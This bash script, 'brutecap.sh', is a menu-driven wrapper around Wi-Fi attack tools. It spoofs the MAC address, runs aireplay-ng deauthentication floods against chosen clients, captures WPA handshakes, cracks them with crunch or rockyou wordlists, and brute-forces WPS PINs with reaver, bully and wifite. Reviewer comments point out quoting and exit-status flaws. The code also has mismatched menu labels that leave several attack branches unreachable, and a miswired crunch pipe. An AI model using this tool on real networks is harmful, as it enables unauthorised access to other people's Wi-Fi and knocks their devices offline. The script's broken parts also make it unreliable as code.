#!/bin/bash
# brutecap.sh: interactive, menu-driven front-end that launches airodump-ng,
# aireplay-ng, aircrack-ng, wash, reaver, bully, wifite and crunch in xterm
# windows. Flat script with no functions; every parameter is collected
# interactively with `read -p`. Expects to run as root and re-executes itself
# under sudo when it is not.
# NOTE(review): no `set -e`/`set -u`, and no expansion below is quoted, so a
# menu choice or typed value containing spaces is word-split before it
# reaches the tool; `read` is used without `-r` throughout, so backslashes in
# typed input are interpreted.
if [ $EUID -ne 0 ]; then
sudo "$0" "$@"
# NOTE(review): with a first argument present this exits with that argument
# as the status code rather than the sudo child's status ($?); with no
# arguments it expands to a bare `exit` and inherits sudo's status.
exit $1
fi
# Decompress the wordlist; runs unconditionally on every start.
gzip -d /usr/share/wordlists/rockyou.txt
clear
sleep 1
figlet BruteCap
echo "This script is for capturing and bruteforcing a wifi handshake capture, along with bruteforcing wps pins."
echo "Select an interface:"
# Interface names from `ip link`, skipping lines matching "lo", "vir" or not
# starting with a digit; awk's `$2a` is $2 concatenated with the unset
# variable `a`, i.e. just the interface field.
interfaces=`ip link | awk -F: '$0 !~ "lo|vir|^[^0-9]"{print $2a;getline}'`
# Outer loop: interface selection. The inner menu's Change_Interface arm
# breaks back to this prompt; Exit leaves the script.
select option in $interfaces; do
echo "$option selected"
echo "Enabling monitor mode"
sleep 1
# Bring the chosen interface down, assign a random MAC, switch it to monitor
# mode and bring it back up. $option is reused by every tool invocation below.
sudo ifconfig $option down
sudo macchanger -r $option
sleep 1
sudo iwconfig $option mode monitor
sudo ifconfig $option up
clear
# Inner loop: top-level attack menu. $ption holds the selected label; the
# case below has no default arm, so an unmatched label just re-prompts.
Attack_Options="Regex_Scan Regex_Capture Cap_BruteForce WPS_attacks Change_Interface Exit"
select ption in $Attack_Options; do
case $ption in
#scan for aps
Regex_Scan)
clear
# $time is the scan duration in seconds; it also drives the termdown
# countdown window started in the background on the next nohup line.
read -p "Time to scan in secs: " time
echo "scaning..."
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time xterm -hold -e sudo airodump-ng $option
;;
#capture handshakes
Regex_Capture)
clear
read -p "Time to scan in secs: " time
echo "Copy BSSID, station mac and channel from scan, press space to pause scan"
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo airodump-ng -M -W $option > /dev/null 2>&1 &
read -p "BSSID to capture from: " BSSID
read -p "Channel: " CHANNEL
read -p "Station to deauth: " STATION
read -p "Name for capture file: " FILE
# Capture runs detached in the background; the foreground xterm blocks until
# its window is closed, at which point control returns to the menu.
nohup xterm -hold -e sudo airodump-ng -c$CHANNEL -w $FILE -d $BSSID $option > /dev/null 2>&1 &
xterm -hold -e sudo aireplay-ng --deauth 0 -a $BSSID -c $STATION $option
;;
#handshake bruteforce
Handshake_BruteForce)
clear
echo "Bruteforcing a handshake capture with aircrack-ng"
# Nested sub-menu; Main_Menu breaks out of this select back to the attack menu.
Cracking_Options="Custom_Charset Crunch_Charset Wordlist_Brute Main_Menu"
select cracking_option in $Cracking_Options; do
case $cracking_option in
#Custom charset with crunch
CustomCharset)
clear
echo "Make custom charsets with crunch"
echo "Leave input blank and press enter for an uneeded option"
read -p "Min length: " min
read -p "Max length: " max
echo "Crunch options:"
echo "@=lower case letters ; ,=capital letters ; %=numbers ; ^=symbols"
echo "Example options: @,%^possible password"
read -p "Enter crunch options and possible password: " possible
read -p "Enter own characters for custom charset: " custom
read -p "Enter path of handshake capture: " path
read -p "SSID: " ssid
# The pipe attaches to xterm's stdout, not to crunch's (crunch writes inside
# the terminal window), so aircrack-ng's `-w -` reads from the xterm process.
xterm -hold -e sudo crunch $min $max -t $possible $custom | sudo aircrack-ng -w - $path -e $ssid
;;
#regular crunch charset
Crunch_Charset)
clear
echo "Use crunch charsets"
read -p "Min length: " min
read -p "Max length: " max
echo "Crunch options:"
echo "@=lower case letters ; ,=capital letters ; %=numbers ; ^=symbols"
echo "Example options: @,%^possible password"
read -p "Enter crunch options and possible password: " possible
read -p "Enter path of handshake capture: " path
read -p "ssid: " ssid
# Same xterm-to-pipe arrangement as the custom-charset arm above.
xterm -hold -e sudo crunch $min $max -t $possible -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space | sudo aircrack-ng -w - $path -e $ssid
;;
#bruteforce with rockyou wordlist, can be changed to a different wordlist
Word_listBrute)
clear
echo "Bruteforce with wordlist"
read -p "Enter path of handshake capture " path
xterm -hold -e sudo aircrack-ng $path -w /usr/share/wordlists/rockyou.txt
;;
Main_Menu)
clear
break
;;
*)
echo "Invalid character"
sleep 1
clear
;;
esac
done
;;
WPS_attacks)
clear
# Nested sub-menu; Main_Menu breaks out of this select back to the attack menu.
wps_options="Scan Pixie_Dust Null_Pin Wifite_Brute Bully_Brute Reaver_Brute_without_pixie Main_Menu"
echo "Select an attack option"
select wps_option in $wps_options; do
case $wps_option in
#scan for aps wit wps enabled
Scan)
clear
read -p "Amount of time to scan for in secs: " time
echo "scanning..."
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
# Both windows are backgrounded here, so the menu re-prompts immediately.
timeout $time xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
;;
#bruteforce withh known default wps pins
Pixie_Dust)
clear
echo "For bruteforcing to stay stable, it recommended to associate with the target network"
read -p "Amount of time to scan for in secs: " time
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
echo "close xterm before entering essid"
read -p "enter bssid: " bssid
read -p "enter essid: " essid
# NOTE(review): prompt has no trailing space/colon; the typed value is $delay.
read -p "Set delay in secs" delay
# Restore the permanent MAC (undoing the random one set at interface setup)
# and show it; $mac below is typed by the user rather than read from here.
sudo ifconfig $option down
sudo macchanger -p $option
sudo ifconfig $option up
sudo macchanger -s $option
iwlist $option channel | grep Current
read -p "Set same channel as target network: " channel
sudo iwconfig $option channel $channel
read -p "network card mac: " mac
sudo aireplay-ng -1 0 -e $essid -a $bssid -h $mac $option
# Printed unconditionally; aireplay-ng's exit status is not checked.
echo "Association complete, starting bruteforce..."
sleep 1
xterm -hold -e sudo reaver -c $channel -i $option -b $bssid -d$delay -vv -K 1
;;
#trying to connect with no pin
Null_Pin)
clear
echo "Null pin attack is bruteforcing with no pin"
read -p "Amount of time to scan for in secs: " time
echo "scanning..."
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
iwlist $option channel | grep Current
echo "close xterm before entering bssid"
read -p "enter channel: " channel
read -p "enter bssid:" bssid
xterm -hold -e sudo reaver -c $channel -i $option -b $bssid -p "" -N
;;
#open up wifite
Wifite_Brute)
clear
xterm -hold -e sudo wifite -i $option -mac --wps
;;
#bruteforce with bully
Bully_Brute)
clear
read -p "Amount of time to scan for in secs: " time
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
echo "close xterm before entering essid"
read -p "enter bssid: " bssid
read -p "enter essid: " essid
xterm -hold -e sudo bully $option -b $bssid -e $essid
;;
#reaver bruteforce with no pin
Reaver_Brute_without_pixie)
clear
read -p "Amount of time to scan for in secs: " time
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
read -p "enter bssid: " bssid
read -p "enter essid: " essid
read -p "enter delay in secs: " delay
xterm -hold -e sudo reaver -i $option -b $bssid -e $essid -d$delay
;;
Main_Menu)
clear
break
;;
*)
clear
echo "invalid character"
;;
esac
done
;;
# Leaves the attack menu and returns to the interface prompt; the interface
# is left in monitor mode with the MAC it currently has.
Change_Interface)
clear
break
;;
# Exits without restoring the interface to managed mode or its original MAC.
Exit)
clear
exit
;;
esac
done
done